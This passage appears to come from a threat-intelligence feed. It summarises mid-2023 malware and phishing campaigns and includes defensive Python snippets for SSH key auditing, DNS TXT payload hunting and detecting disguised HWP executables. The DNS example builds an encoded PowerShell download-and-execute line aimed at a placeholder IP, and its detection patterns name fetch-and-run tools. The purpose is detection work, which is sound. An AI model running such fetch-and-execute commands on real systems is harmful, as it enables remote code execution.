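        fh.write("#!/bin/sh\n# placeholder, not the real payload\n")
    with open(os.path.join(tmp_dir, ".iCE-unix.pid"), "w") as fh:
        fh.write("4242\n")
    return home, tmp_dir


def run_demo():
    """Build the sample host in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        home, tmp_dir = build_sample_host(base)
        return scan(home, tmp_dir, {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOwnerKeyPlaceholder"})


if __name__ == "__main__":
    for indicator, value in run_demo().items():
        print(indicator, "->", value)
```

The allow-list is keyed on type plus key material rather than the whole line, so an attacker cannot slip past the check by adding a comment or key options to a copied entry.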
—
- Intel Source:
- Microsoft
- Intel Name:
- StormP_0978_phishing_campaign_uncovered_by_Microsoft
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Microsoft identifies Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, the group runs phishing campaigns and distributes the RomCom backdoor. Storm-0978 conducts opportunistic ransomware and espionage-related operations.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Rootkit_acts_as_a_universal_loader
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Trend Micro researchers observed a new signed rootkit, originating from China, that targets the gaming sector. The rootkit acts as a universal loader and communicates with command-and-control infrastructure. It passed through the Windows Hardware Quality Labs process and obtained a valid signature. It was reported to Microsoft’s Security Response Center.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have uncovered a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-stage infection chain, using specially crafted modules at each stage.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malicious_batch_file
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). The malware downloads different scripts depending on which anti-malware processes, including AhnLab products, are running in the user’s environment. Based on the function names used by the malware and the URL parameters of the download, it is suspected to have been distributed by the Kimsuky group.
—
- Intel Source:
- ASEC
- Intel Name:
- Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
- Date of Scan:
- 2023-07-11
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years and shares a brief analysis. The Rekoobe variants are also categorized, with a summary of the ones used to target Korean companies.
—
- Intel Source:
- Lab52
- Intel Name:
- Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Lab52 researchers have identified several maldoc samples from a potential malicious campaign. The campaign appears to target Chinese-speaking users, as the content of the maldoc is written in Chinese. The infection chain resembles that of the threat actor APT29, but significant differences from APT29’s typical infection chain suggest that it is not this threat actor.
Source:
https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_BlackByte_ransomware_deep_analyses
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- The Microsoft Incident Response team observed a threat actor go through the full attack chain, from initial access to impact, in less than five days, causing major business disruption for the victim organization. Their findings show that within those five days the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_malvertising_USPS_campaign
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Malwarebytes researchers observed a recent phishing attack targeting both mobile and desktop users looking to track their packages via the United States Postal Service website.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
- Date of Scan:
- 2023-07-10
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing_Attacks_by_APT28_Group
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and exfiltrate the authentication data entered by the victim via HTTP POST requests. The stolen data is transferred through previously compromised Ubiquiti devices (EdgeOS).
—
- Intel Source:
- TrendMicro
- Intel Name:
- Deep_details_of_Big_Head_Ransomware_s_Variants
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Deeper analysis of the Big Head ransomware variants, with updated IOCs.
—
- Intel Source:
- ASEC, Ciberdefensa
- Intel Name:
- The_distribution_of_NetSupport_RAT
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- ASEC researchers discovered NetSupport RAT being distributed via a spear-phishing email that has recently been in circulation. Their analysis covers the whole process, from distribution via phishing emails to detection.
Source:
https://ciberdefensa.cat/archivos/16021
https://asec.ahnlab.com/en/55146/
—
- Intel Source:
- CISA
- Intel Name:
- Increasing_TrueBot_Malware_Attacks
- Date of Scan:
- 2023-07-09
- Impact:
- MEDIUM
- Summary:
- CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a new ransomware strain named “Underground Team ransomware”. Its ransom note introduces novel elements that distinguish it from typical ransom notes: in addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.
Source:
https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
—
- Intel Source:
- Cyble
- Intel Name:
- ARCrypter_ransomware_activity
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- ARCrypter ransomware, also known as ChileLocker, drew attention in August 2022 with an attack in Chile. Researchers soon found that the ransomware had started targeting organizations worldwide, on both Windows and Linux. This year, researchers reported a new Linux variant of ARCrypter written in Go, as well as an updated version of the ARCrypt Windows executable. The researchers also identified new techniques the TA uses to interact with victims. Compared with the older ARCrypt variant, the ransom note of each binary points to a mirror site, and the TA created a dedicated Tor-hosted chat site for each victim.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have identified a campaign in which a Chinese threat actor targets government entities in Europe, with a focus on foreign and domestic policy entities.
Source:
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
—
- Intel Source:
- Reliaquest
- Intel Name:
- The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”
Source:
https://www.reliaquest.com/blog/gootloader-infection-credential-access/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Diving_Deep_into_Emotet_Malware_Family
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. It has launched multiple spam campaigns since it reappeared after its takedown. Mealybug has also created multiple new modules and repeatedly updated and improved all existing modules.
Source:
https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/
—
- Intel Source:
- Aquasec
- Intel Name:
- Analysis_of_Silentbobs_Cloud_Attack
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Aqua Nautilus researchers have identified the infrastructure of a potentially massive campaign against cloud-native environments. It is in the early stages of testing and deployment and consists mainly of an aggressive cloud worm designed to deploy on exposed JupyterLab and Docker APIs in order to drop Tsunami malware, hijack cloud credentials, hijack resources, and spread the worm further.
Source:
https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack
—
- Intel Source:
- Sekoia
- Intel Name:
- NoName_057_16_DDoSia_Project_Gets_an_Upgrade
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.
Source:
https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/
—
- Intel Source:
- Cyble
- Intel Name:
- Multiple_New_Clipper_Malware_Variants
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered several Clipper malware variants in the past, including Laplas Clipper, IBAN Clipper, and Keona Clipper. Recently, they observed several new variants and a significant number of related samples submitted to VirusTotal. Clipper malware hijacks cryptocurrency transactions by silently replacing the victim’s wallet address in the clipboard with the Threat Actors’ (TAs’) wallet address. When an unsuspecting user pays from their cryptocurrency account, the transaction is diverted to the TAs’ account instead of the intended recipient, which can cause significant financial losses for the victim.
Source:
https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/
—
- Intel Source:
- Quickheal
- Intel Name:
- White_Snake_stealer_threat
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Quick Heal researchers detail the technical aspects of the updated WhiteSnake stealer version 1.6, providing insights into its behaviour and its latest capabilities.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attackers_Targeting_North_Atlantic_Treaty_Organization
- Date of Scan:
- 2023-07-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered a website that copies the English version of the legitimate web page of the international non-governmental organization “World Congress of Ukrainians”.
—
- Intel Source:
- Elastic
- Intel Name:
- New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.
Source:
https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
—
- Intel Source:
- Sentinelone
- Intel Name:
- Neo_Nets_eCrime_campaign_targeted_financial_institutions
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking Neo_Net, which conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised the personal information of thousands of victims. The campaign involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.
Source:
https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/
—
- Intel Source:
- Uptycs
- Intel Name:
- Meduza_Stealer
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- The Uptycs Threat Research team discovered a malware named Meduza Stealer. Created by an actor known as ‘Meduza’, it is designed to target Windows users and organizations, and currently targets only ten specific countries. Its purpose is data theft: it harvests a wide array of browser-related data, from login credentials to browsing history and bookmarks, and also targets crypto wallet extensions, password managers, and 2FA extensions.
Source:
https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_tool_for_the_Akira_ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Researchers at Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023, and since then the gang has claimed successful attacks on organizations in the education, finance and real estate industries, amongst others.
Source:
https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
- Date of Scan:
- 2023-07-05
- Impact:
- HIGH
- Summary:
- Wordfence researchers have identified a privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. The vulnerability has not been adequately patched in the latest version available, 2.6.6.
—
- Intel Source:
- Inky
- Intel Name:
- Malicious_QR_Codes_are_getting_to_employee_credentials
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- INKY recently discovered a multitude of QR code phishing emails and shared their findings.
—
- Intel Source:
- Sophos
- Intel Name:
- Th_connection_investigation_of_2_clients_in_2_threat_hunts
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Sophos researchers investigated two threat hunts at two clients for any connection between them. Using Microsoft’s cloud-security API to parse piles of disparate data led to captivating results.
—
- Intel Source:
- ASEC
- Intel Name:
- Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- New_C2_Framework_Leveraging_by_MuddyWater
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have attributed a previously unseen command-and-control (C2) framework called PhonyC2 to the Iranian state-sponsored group MuddyWater, which has been using it since 2021.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_being_executed_using_DNS_TXT_records
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.
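Because TXT records are rarely inspected, a practical first detection is to triage the TXT answers your resolver logs: skip the well-known benign record types, then look for answers that are base64-encoded script, plaintext script, or simply far larger than a normal TXT record. The example below is added here and is not ASEC’s code; the tab-separated log lines are constructed (timestamp, query name, query type, answers, loosely modelled on a Zeek dns.log), the encoded PowerShell one-liner is built inline from a harmless string, and the benign-prefix list, script markers and 200-character size threshold are assumptions for the example.

```python
"""Triage of DNS TXT answers for script payloads (added example)."""
import base64
import binascii
import re

# Constructed: a command of the kind a loader might fetch, base64-encoded the
# way it would appear in a TXT answer. It is never executed here.
SAMPLE_CMD = ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://198.51.100.77/a')\"")
ENCODED = base64.b64encode(SAMPLE_CMD.encode()).decode()

# Constructed resolver log: ts, qname, qtype, answers (comma-separated), tab-separated.
DNS_LOG = (
    "1688428800.100\tmail.example.com\tTXT\tv=spf1 include:_spf.example.com -all\n"
    "1688428801.200\t_dmarc.example.com\tTXT\tv=DMARC1; p=reject; rua=mailto:dmarc@example.com\n"
    "1688428802.300\tcfg.update-check.test\tTXT\t" + ENCODED + "\n"
    "1688428803.400\twww.example.com\tA\t203.0.113.5\n"
    "1688428804.500\tnote.example.com\tTXT\thello world\n"
)

BENIGN_TXT_PREFIXES = ("v=spf1", "v=DMARC1", "v=DKIM1", "google-site-verification=", "MS=")
SCRIPT_MARKERS = re.compile(
    r"powershell|IEX\b|Invoke-Expression|DownloadString|cmd\.exe|/bin/sh|wget |curl ", re.I)
OVERSIZED = 200  # assumption: legitimate TXT answers are usually well below this


def try_b64(s):
    """Decoded text if `s` is strict base64 of printable UTF-8, else None."""
    if len(s) < 16 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/=]+", s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify_txt(answer):
    """Reasons a single TXT answer is suspicious, or None when it looks benign."""
    if answer.startswith(BENIGN_TXT_PREFIXES):
        return None
    reasons = []
    decoded = try_b64(answer.replace(" ", ""))
    if decoded is not None and SCRIPT_MARKERS.search(decoded):
        reasons.append("base64-script")
    if SCRIPT_MARKERS.search(answer):
        reasons.append("plaintext-script")
    if len(answer) > OVERSIZED:
        reasons.append("oversized")
    return reasons or None


def hunt(log_text):
    """Return (qname, reasons, answer_prefix) for every suspicious TXT answer."""
    findings = []
    for line in log_text.splitlines():
        _ts, qname, qtype, answers = line.split("\t")
        if qtype != "TXT":
            continue
        for answer in answers.split(","):
            reasons = classify_txt(answer)
            if reasons:
                findings.append((qname, reasons, answer[:40]))
    return findings


if __name__ == "__main__":
    for finding in hunt(DNS_LOG):
        print(finding)
```

The base64 check is deliberately strict (length a multiple of four, valid alphabet, printable result) so that ordinary verification tokens, which are often base64-like but short or non-decodable, do not flood the output; loosen it if the loader you are hunting uses a custom alphabet.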
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Updated_GuLoader_loader
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Disguised_as_HWP_Document_File_Kimsuky
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.
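The lure relies on the file’s name disagreeing with its content, which is cheap to check on a mail gateway or a triage box: sniff the leading bytes and compare them with every extension in the name, and look for the update.vbs drop in %APPDATA%. The example below is added here and is not ASEC’s code. Its magic-byte table is an assumption of the example (HWP 5.x files use the OLE2 compound-file header shared with legacy Office formats, HWP 3.x starts with an ASCII signature, HWPX is a zip container); the sample files it writes are constructed stubs, and `appdata_dir` stands in for %APPDATA% so it runs on any platform.

```python
"""Extension-versus-content triage for disguised executables (added example)."""
import os
import tempfile

# Magic-byte table: assumption for this example.
SIGNATURES = [
    (b"MZ", "pe-executable"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2-compound"),  # HWP 5.x, .doc, .xls
    (b"HWP Document File", "hwp3"),
    (b"PK\x03\x04", "zip"),  # .hwpx, .docx
]
DOC_EXTS = {".hwp", ".hwpx", ".doc", ".docx", ".pdf", ".txt"}
EXE_EXTS = {".exe", ".scr", ".com", ".pif", ".dll"}
HWP_KINDS = {"ole2-compound", "hwp3"}


def sniff(head):
    """Content type from the leading bytes, or 'unknown'."""
    for magic, label in SIGNATURES:
        if head.startswith(magic):
            return label
    return "unknown"


def extensions(name):
    """Every extension in a name, lowercase: 'a.hwp.exe' -> ['.hwp', '.exe']."""
    parts = name.lower().split(".")
    return ["." + p for p in parts[1:]]


def assess(name, head):
    """Reasons the file looks like a disguised payload; [] when name and content agree."""
    kind, exts = sniff(head), extensions(name)
    reasons = []
    if kind == "pe-executable":
        if any(e in DOC_EXTS for e in exts):
            reasons.append("PE with document extension in name")
        if not exts or exts[-1] not in EXE_EXTS:
            reasons.append("PE without executable extension")
    elif exts and exts[-1] == ".hwp" and kind not in HWP_KINDS:
        reasons.append("claims .hwp but content is " + kind)
    return reasons


def triage(sample_dir, appdata_dir):
    """Assess every file in sample_dir and check for the dropped update.vbs."""
    verdicts = {}
    for name in sorted(os.listdir(sample_dir)):
        with open(os.path.join(sample_dir, name), "rb") as fh:
            reasons = assess(name, fh.read(32))
        if reasons:
            verdicts[name] = reasons
    return {
        "suspicious_files": verdicts,
        "update_vbs_present": os.path.isfile(os.path.join(appdata_dir, "update.vbs")),
    }


def build_samples(base):
    """Constructed sample set: two disguised PE stubs, a genuine-looking HWP5 header,
    a text file, and a placeholder update.vbs in the fake %APPDATA%."""
    sample_dir = os.path.join(base, "attachment")
    appdata_dir = os.path.join(base, "AppData", "Roaming")
    os.makedirs(sample_dir)
    os.makedirs(appdata_dir)
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60  # DOS header start only, nothing runnable
    files = {
        "guide.hwp": pe_stub,
        "notice.hwp.exe": pe_stub,
        "real.hwp": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24,
        "readme.txt": b"Please read the attached document.\n",
    }
    for name, data in files.items():
        with open(os.path.join(sample_dir, name), "wb") as fh:
            fh.write(data)
    with open(os.path.join(appdata_dir, "update.vbs"), "w") as fh:
        fh.write("' placeholder standing in for the dropped script\n")
    return sample_dir, appdata_dir


def run_demo():
    """Build the samples in a temporary directory, triage them, return the result."""
    with tempfile.TemporaryDirectory() as base:
        sample_dir, appdata_dir = build_samples(base)
        return triage(sample_dir, appdata_dir)


if __name__ == "__main__":
    print(run_demo())
```

Only the first 32 bytes are read per file, so the check is cheap enough to run over a whole mail spool; the `.hwp` branch also catches the reverse case, a file that claims to be a document but is neither OLE2 nor HWP3.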
—
- Intel Source:
- Cofense
- Intel Name:
- HMRC_Self_Assessment_Phish_Outsmart_SEGs
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and regrettably, these phishing emails often evade popular secure email gateways (SEGs) that are meant to provide protection for users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile. This is a common tactic employed by threat actors to generate a deceptive perception of urgency and legitimacy.
—
- Intel Source:
- Morphisec
- Intel Name:
- GuLoader_Campaign_Targets_Law_Firms_in_the_US
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- Morphisec discusses a GuLoader campaign targeting law firms in the US, highlighting the campaign’s focus on specific industries and its use of legitimate hosting services to distribute malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec’s AMTD technology can protect systems from these attacks.
Source:
https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us
—
- Intel Source:
- volexity
- Intel Name:
- Charming_Kitten_updates_backdoor_called_POWERSTAR
- Date of Scan:
- 2023-07-02
- Impact:
- MEDIUM
- Summary:
- One threat actor Volexity researchers frequently observe is Charming Kitten, assessed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and, subsequently, the email of individuals it successfully spear-phishes. Volexity analyzed a new version of the POWERSTAR backdoor, which led to the discovery that Charming Kitten has been spreading its malware alongside its spear-phishing techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with its system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provides statistical information on each type.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- Unit 42 researchers discovered two Cobalt Strike Team Server instances hosted online, along with new malleable C2 profiles that are not publicly available and that attackers use to evade detection. The operators of these Team Server instances hide their C2 infrastructure behind popular services and public cloud infrastructure providers. The researchers also provide guidance for Palo Alto Networks customers on protection and mitigation against Cobalt Strike Beacon and related Cobalt Strike tools.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/
—
- Intel Source:
- vmware
- Intel Name:
- 8Base_Ransomware
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The 8Base ransomware group has remained relatively unknown despite a massive spike in activity in the summer of 2023.
Source:
https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_exposion_of_active_adversary_JokerSpy
- Date of Scan:
- 2023-07-01
- Impact:
- LOW
- Summary:
- Researchers at Bitdefender and Elastic have discovered an active adversary using novel spyware, cross-platform backdoors and an open-source reconnaissance tool to compromise organizations with macOS devices in their fleet. Although few victims are known at this time, the analysis suggests the threat actors have likely targeted other organizations. SentinelOne researchers shared the key components and indicators used in the campaign to raise awareness and aid security teams and threat hunters.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Manic_Menagerie_2_0_threat_actor
- Date of Scan:
- 2023-07-01
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers discovered an active campaign targeting several web hosting and IT providers in the United States and European Union from late 2020 to late 2022. Unit 42 tracks the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the earlier campaign known as Manic Menagerie.
Source:
https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Fast_Developing_ThirdEye_Infostealer
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently discovered some suspicious-looking files. Their investigation found the files to be malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer, named “ThirdEye”. While this malware is not considered sophisticated, it is designed to steal various information from compromised machines that can be used as a stepping stone for future attacks.
—
- Intel Source:
- Cofense
- Intel Name:
- Malicious_Actors_deploy_phishing_pages_to_mobile_devices
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center analysts have discovered a spike in the number of malicious emails using QR codes. QR codes give threat actors a different way to encode malicious URLs in order to bypass traditional file and text detection software.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
- Date of Scan:
- 2023-06-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team collects and analyzes malware samples weekly; this report covers June 5-11, 2023. They use their automatic analysis system RAPIT to categorize and respond to known malware. The top malware families this week were Amadey, Lokibot, GuLoader, AgentTesla and Formbook.
—
- Intel Source:
- Cyble
- Intel Name:
- Linux_Users_at_Risk_From_Akira_Ransomware
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.
Source:
https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
—
- Intel Source:
- Avanan
- Intel Name:
- PDF_Based_Attacks_Are_Becoming_More_Common
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate ‘DocuSign’ document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient’s email address.
Source:
https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them
—
- Intel Source:
- Cybergeeks
- Intel Name:
- The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- SALTWATER is a backdoor deployed through exploitation of the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon (bsmtpd) that hooks the recv, send, and close functions using the open-source hooking library funchook. It implements the following functionality: executing arbitrary commands, downloading and uploading files, proxying, and tunneling.
—
- Intel Source:
- KrebsOnSecurity
- Intel Name:
- SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Black_Basta_ransomware_cover_of_roundup
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining interest within their datasets and the OSINT community. Their Ransomware Roundup report shares brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta
—
- Intel Source:
- Cyble
- Intel Name:
- The_details_of_Wagner_Groups_Cyber_campaign
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- Cyble researchers investigated a new ransomware called Wagner, possibly a variant of Chaos ransomware. The ransom note urges users to join the PMC Wagner. The ransomware sample was first submitted to VirusTotal from Russia, and because the ransom note is written in Russian, it is assumed that the ransomware primarily targets victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.
Source:
https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Examination_of_Trickbot_and_Conti_Crypters
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.
Source:
